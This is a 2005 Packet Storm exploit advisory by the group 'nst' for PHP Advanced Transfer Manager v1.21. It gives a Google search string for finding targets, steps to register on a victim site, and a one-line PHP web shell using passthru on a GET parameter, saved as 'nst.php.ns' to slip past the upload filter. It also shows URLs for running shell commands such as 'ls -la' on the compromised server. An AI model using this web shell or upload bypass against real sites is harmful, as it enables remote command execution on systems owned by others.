phpAdvanced.txt

2005-08-07T00:00:00
ID PACKETSTORM:39103
Type packetstorm
Reporter nst.void.ru
Modified 2005-08-07T00:00:00

Description

                                        
                                            `oooo...oooo.oooooooo8.ooooooooooo  
.8888o..88.888........88..888..88   
.88.888o88..888oooooo.....888   
.88...8888.........888....888   
o88o....88.o88oooo888....o888o   
********************************  
**** Network security team *****  
********* nst.void.ru **********  
********************************  
* Title: PHP Advanced Transfer Manager v1.21  
* Bug found by: nst  
* Date: 06.05.2005  
********************************  
  
Owner: phpatm.free.fr  
Google: allintitle:PHP Advanced Transfer Manager  
  
Status: Critical  
  
*** File upload.  
  
1. Register :: http://victim/register.php  
2. Login :: http://victim/login.php  
  
  
Create file:  
nst.php.ns  
  
<pre>  
<?  
passthru($_GET['nst']);  
?>  
  
Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la  
  
or  
  
<?  
passthru($_GET['nst']);  
?>  
  
Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt  
  
`